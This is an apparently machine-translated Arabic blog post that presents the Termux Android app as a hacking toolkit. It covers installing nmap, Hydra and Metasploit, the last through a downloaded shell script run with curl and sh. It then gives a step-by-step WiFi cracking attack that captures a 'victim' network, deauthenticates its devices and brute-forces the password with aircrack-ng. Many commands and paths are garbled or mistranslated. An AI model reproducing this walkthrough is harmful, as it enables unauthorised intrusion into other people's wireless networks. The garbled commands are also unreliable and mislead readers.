تثبيت تطبيق termux على الأندويد وبدأ إختبار الإختراق الهواتف

إذا كنت تعتقد أن الاختراق الأخلاقي يقتصر على استخدام أجهزة كمبيوتر المكتبية أو أجهزة الكمبيوتر المحمولة لهذه المسألة ، فكر مرة أخرى لأنه إذا كنت قد شاهدت الطريقة التي قمت بها ، فإن مطوري الطرف الثالث يلعبون دوراً كبيراً في سد الثغرات خلال كل مرحلة من مراحل التطور التكنولوجي. في هذا الدليل ، سوف نتعرف على اختصارات تيرمكس المختلفة ، ودروس التيروكس ، وقوائم أوامر الإختراق "وايموكس" ، ودليل التجهيز ، وأداة "تيروكس" ، وأرشيفات التطبيقات والحزم.

طور مطور مشابه لطرف ثالث يسمى "Anonymous" تطبيقًا قائمًا بذاته من نظام التشغيل Linux يسمى "Termux" والذي يتم استخدامه لتثبيت تطبيقات تستند إلى Linux في Android ويساعد في تشغيل تطبيقات Linux خالصة في Android.

الآن سوف تتساءل لماذا أحتاج إلى تطبيقات LINUX؟

تمتلك LINUX تاريخًا في كونها مبرمجًا مركزيًا ، لذا فإن الغرض من تطبيق TERMUX هو مساعدة متخصصي Cyber Security في أنظمة المراقبة وممارسات الأمان عبر الإنترنت مثل اختبار الاختراق من خلال شبكات المحمول.

مقارنةً بملايين التطبيقات في متجر Google Play ، والتي تعتبر كلمات Mr. Peters "منافذ" لتطبيقات Linux والتي يتم إنشاؤها بطريقة Android ، TERMUX هو تطبيق LINUX خالص يحتوي على بنية مستقلة لمنصة التشغيل مما يجعلها محمولة ومتوافقة مع حتى ويندوز.

قبل أن نستمر في شرح سطر بسيط على واجهة المستخدم: واجهة المستخدم هي واجهة سطر الأوامر.

أعتقد أن MS-DOS وجميع أجهزة الكمبيوتر التي كانت موجودة في نظامي التشغيل Windows و MacOS سوف تعرف ما أتحدث عنه. لا توجد أي رموز أو تعليمات خفية. فقط أنت ومهاراتك.


اداة اختراق تيرموكس
تطبيقات TERMUX مثل HYDRA و NMAP سهلة الاستخدام والتركيب. كما أنها مستقلة عن النظام الأساسي ، كما أن إصدارات Android الخاصة بها متطابقة أيضًا مع إصدارات LINUX الخاصة بها.

تفرد TERMUX تكمن في منشأة التثبيت غير الجذر. يعني التأصيل و تسهيلات مميزة على التطبيقات المثبتة.

هذه الميزة تجعل من السهل على المستخدمين تثبيت البرامج المعقدة مثل NMAP و HYDRA.

أدوات Termux
NMAP هو مخطط شبكة مفتوحة المصدر كتبه غوردون ليون (المعروف أيضا باسم فيودور فاسكوفيتش). كما يقترح أعلاه ، الغرض منه هو البحث عن المضيفين والشبكات في منطقة معينة من خلال إرسال حزم البيانات المصممة خصيصا وتحليل استجاباتهم. في أيدي خبراء سايبر سيكيوريتي ، يعتبر بمثابة أداة فعالة لتدقيق الشبكة ، وإجراء المسح الأمني ​​ولإجراء أنشطة أمن الشبكات الأخرى المشابهة.

يمكن تركيب "NMAP" في TERMUX بكتابة ما يلي: "pkg install nmap". التثبيت سريع وسريع. بعد ذلك يمكنك استخدام "NMAP" عن طريق كتابة اسمه في البحت.

HYDRA هو برنامج حاسوبي آخر قائم على سطر الأوامر قادر على تنفيذ هجمات القاموس على البروتوكولات والشبكات المكشوفة.

دليل تيرمكس
يتوفر Termux على Google PlayStore و F-Droid. تحميل مجاني وسهل الاستخدام. يجب أيضًا تنزيل مكوناته الإضافية التي تساعد واجهة التطبيق مع Android API.
نصيحة للمحترفين:
أيضا يجب تحميل لوحة المفاتيح التي لديها أزرار CTRL و ESC في ذلك. ستحتاج إليها أثناء العمل في التطبيق. أفضل الحصول عليه من F-Droid.

دعنا نقوم الآن بإعداد التطبيق. نظرًا لأنه تطبيق يشتغل بسطر أوامر مثل DOS ، يتعين عليك الاعتماد على مهارات الحفظ لإتقان التطبيق. اكتب الأمر: "ترقية pkg" لتحديث كل الحزم المضمنة ثم قم بتشغيل "touch.hushlogin". هذا يساعد على فتح جميع الحزم التي ستحتاجها لعملك.

على سبيل المثال ، حصل السيد كونراد بعد تحميل التطبيق على الحزم التالية: Python و Ruby و NodeJS و GO و C Programming من خلال الكود السحري التالي:

pkg python cmakenodejs ruby ​​golang

الانتقال إلى إعداد مساحة العمل. يوفر TERMUX التالي كموقع حفظ افتراضي لكل ملفاتك:
/data/data/com.termux/files/home
ولكن يمكنك أيضًا تغيير الموقع باستخدام شفرة المثال التالي

mkdir notes gh homework temp
التالي هو تكوين dotfiles. فيما يلي مثال على ذلك:

cd gh && git clone https://github.com/konradit/dotfiles.git && cp dotfiles / bashrc ~ / .bashrc
الآن قم بتثبيت الحزم الأساسية باستخدام المثال التالي ثم اكتب exit للخروج وإدخال التطبيق مرة أخرى. الرمز هو:

pkg install coreutilstermux-apitermux-exec termux-tools grep tree ncurses-utilsopensshgpg

الآن الأوامر المختصرة هي:

n: cd $ HOME / notes
nn: cd $ HOME / notes && vim
t: cd $ HOME / temp
gh: cd $ HOME / gh
hh: cd $ HOME / homework

بالإضافة إلى ذلك ، يمكنك فقط كتابة اسم الدليل و cd إليه. إذا كنت تريد تشغيل tmux تلقائيًا عند إدخال shell:

صدى "tmux" >> ~ / .bashrc
نصيحة للمحترفين: الضغط لفترة طويلة لنسخ / لصق ، وتغيير نظام الألوان وتغيير الخط!

استخدامات TERMUX غير محدودة. هناك أشخاص يستضيفون الخوادم ، ويستخدمون بعض مقاطع فيديو YouTube التي تستخدمها كنوع من أساليب وضع التصفح المتخفي ، بالإضافة إلى أن هناك أيضًا أشياء "بحثًا" تم إجراؤها بواسطة أفراد معينين.

نظرًا لأنه برنامج ، فإن قائمته من الأوامر المفيدة لا حصر لها أيضًا. فيما يلي قائمة بأوامر العينة المقدمة من أصدقائي المستخدمة في TERMUX التي اكتسبتها من قبلي بسبب الافتقار الكبير للمواد المناسبة من الموارد المتاحة لهذه التدوينة. في ما يلي الرموز مع أوصافها:

pip install youtube-dl	For installing Youtube-dl
Packages install python	Installs Python
termux-setup-storage	Gives TERMUX access to your file system
mkdir ‘dir-name	For creating directory
cd “dir-name”	For changing directory
cat “file-name”	For reading any file
mv /path/file  /path where file is moved	For moving files from one path to another.
cp  /path/file  /path where to copy file	For copying files from one path to other
rm filename.file-extension	For removing mentioned file from a certain directory.
ping “website URL”	Helps verify IP level connectivity
toilet -f mono12 -F gay “your text”	Presents text in a specified format.
apt show (app-name)	Gives a short but detailed summary on mentioned name of desired app.
apt show (app-name)	Installs the desired app

كيفية اختراق باستخدام Termux؟
# 1. كيفية تشفير وفك تشفير ملفات PDF باستخدام TERMUX
فيما يلي قائمة "الأدوات" المطلوبة لإعداد هذا التحرير والسرد:

Termux: تحميل من الرابط
تطبيق فتح الملفات: تحميل من رابط
رابط GitHub: https://Arba7hna.com/NzlOHI
الخطوة # 1: تشغيل TERMUX ، تنفيذ التعليمات البرمجية التالية ثم اضغط Enter. الرمز هو:

"تحديث pkg & & pkg ترقية & & pkg تثبيت python2 && pkg install git"

النتيجة؟ يتم تثبيت الحزم المذكورة في النظام الخاص بك.

الخطوة # 2: اكتب التعليمة البرمجية التالية واضغط ENTER. الرمز هو: "cd peepdf"

.

الخطوة رقم 3: الآن اكتب الأمر chmod + x peepdf.py واضغط على Enter

الخطوة رقم 4: اكتب python2 peepdf.py -i واكتب Enter.

الخطوات المذكورة أعلاه تساعد في تثبيت PDF Unlocker في النظام.
الآن نأتي إلى جزء التشفير.
الخطوة رقم 1: بعد فتح ملف PDF ، اكتب أمر تشفير Yourpassword هنا "YourPassword" هو كلمة مرور ملف PDF لفتح.

الخطوة رقم 2: ثم اكتب الأمر "حفظ" واضغط على Enter الذي يجعل كلمة مرور PDF محمية - تظهر ملاحظة على الشاشة تصف نفسها.

# 1.1. كيفية فك تشفير الملفات
الخطوة رقم 1: افتح الملف مرة أخرى بواسطة الأمر open -f /sdcard/FileName.pdf و اضغط على Enter.

الخطوة رقم 2: ثم اكتب أمر فك تشفير YourPassword واضغط على Enter. يجب أن تكون كلمة المرور هي نفسها التي تم تعيينها لتشفير ملف PDF نفسه. في حالة وجود مشكلة ، يتوفر برنامج PDF Unlocker دائمًا لمساعدتك.

# 2. تثبيت Metasploit باستخدام Termux
مشروع Metasploit هو مشروع أمان الكمبيوتر الذي يوفر معلومات حول نقاط الضعف الأمنية والمساعدة في اختبار الاختراق وتطوير توقيع IDS.

فيما يلي الخطوات التي يجب اتباعها لتثبيت Metasploit:

رقم 1: تثبيت خدمة Termux من متجر Google Play

رقم 2: فتح وانتظر ذلك لعملية التثبيت الخاصة به.

# 3: الآن اكتب هذه الأوامر

تحديث
رقم 4: بعد تحديث النوع المكتمل من الأمر

تثبيت apt 
# 5: الآن اكتب

"cd $ HOME"
# 6: الآن اكتب / انسخ هذا الأمر

curl -LO https://raw.githubusercontent.com/Techzindia/Metasploit_For_Termux/master/metasploitTechzindia.sh

رقم 7: بعد تنزيل الملف أعلاه ، اكتب

IS
رقم 8: سترى ملف .sh. الآن اكتب هذا الأمر

chmod + x metasploitTechzindia.sh

رقم 9: الآن تشغيل سيناريو حسب نوع الأوامر

sh metasploitTechzindia.sh

سترى بدأت العملية. لذلك انتظر حتى ينتهي.

[تحذير]: لا تعمد إلى إيقاف اتصال البيانات أو اتصال WiFi.

# 10: الآن اكتب ،

IS
سترى مجلد metasploit-framework.

رقم 11: افتح مجلدًا بكتابة

cd <yourfoldername>

رقم 12: أمر "ls" ، سترى قائمة بالملفات والمجلدات.

# 13: الآن اكتب "./msfconsole" لتشغيل Metasploit.

قم أولاً بتوصيل محول الزوجة الخاص بك بجهازك:

1) أولاً بفتح تطبيق Gnu Root Debian أو جذر الشاشة الطرفية وبدء وضع بكتابة هذه الأوامر:

airmon-ng

airmon-ng start wlan0
2) الآن قم بالكشف عن الشبكة بكتابة هذا الأمر:

airodump-ng wlan0mon
هنا ترى جهازك المستهدف وإيقاف الكشف عن طريق control + z.

3) الآن يجب إنشاء مجلد واحد واسمه على على سطح المكتب أو بطاقة الذاكرة الرقمية المؤمنة وأيضا إنشاء قائمة كلمات المرور اضغط قوة التواصل واي فاي ، وجمع المعلومات حول الضحية وإنشاء قائمة كلمات المرور للقوة التكرار.

4) نسخ BSSID للضحية ولاحظ أيضًا رقم قناة CH  واكتب هذا الأمر:

airodump-ng -c 6 --bssid00: 26: 44: AB: C5: C0 -w / root / Desktop / cap / wlan0mon-w

هناك يجب عليك إعطاء مسار مجلد الحد الأقصى إذا كان لديك هذا المجلد على SDCARD ثم يمكنك إعطاء هذا المسار:
 -w / sdcard / cap / wlan0mon

5) الآن افتح نافدة طرفية أخرى وافصل جميع الأجهزة مع هذا الأمر والتقط نوع اتصال واي فاي نفسه ولكن استخدم هنا الهدف bssid:

aireeplay-ng -0 5 -a 00: 26: 44: AB: C5: C0 -wlan0mon

الآن وقف الهجوم عن طريق control + z. وإغلاق النافدة.

6) الآن لصق قائمة كلمات المرور في مجلد الخاص بك ، وكذلك انتقل إلى مجلد مجلد كاب

التكريك الآن مع هذا الأمر:

aircrack-ng -w pass.list 01.cap

7) هذا هو هجوم القوة المتكرر إذا تطابقت أي كلمة مرور مع الواي فاي يتم كسرها. وستحصل على المفتاح (يعني كلمات المرور)


# 4. تحويل جهاز Android إلى خادم ويب
يجب أن أقول أن هذا الاختبار التجريبي تم اختباره وعمله فقط مع إطار عمل Iris ، المكتوب في Golang و Android الإصدار 5.1.

فيما يلي الخطوات:

رقم 1: تثبيت وفتح الإصدار

# 2: تنفيذ الأوامر التالية بالترتيب

pkg $ git تثبيت
$ pkg تثبيت golang
$ export GOPATH = / data / data / com.termux / files / home / go
$ go get -u -v github.com/kataras/iris
$ cd /data/data/com.termux/files/home/go/src/github.com/kataras/iris/_examples/hello-world
$ go تشغيل main.go
# 3: افتح متصفحك المفضل وانتقل إلى http: // localhost: 8080

استنتاج
وأخيرا ، أود أن أختتم بأن TERMUX هي واحدة من التطبيقات القليلة التي لا فائدة لها عموما. تخبرني تجربتي أنه عندما لا يكون لدى الشخص إشارة صحيحة للتراجع ، فإن الطريقة الوحيدة للتعلم تصبح من خلال التجريب.

هذا هو التجريب الذي يساعد الشخص على معرفة المزيد حول ما يستخدمه من خلال الكتب. ولهذا السبب أقترح على القراء تجربة TERMUX لمعرفة المزيد عن استخدامه.

قال شخص عظيم ذات مرة: "مع قوة عظمى تأتي مسؤولية كبيرة". الحفاظ على السلام في المجتمع هو مسؤوليتنا. ولهذا السبب عند استخدام تطبيقات مثل TERMUX ، قم بذلك لأغراض تعليمية وليس للتسبب في ضرر لأحد. حتى قبل التفكير في ارتكاب مثل هذه الأفعال ، وفر تفكيرًا لوالديك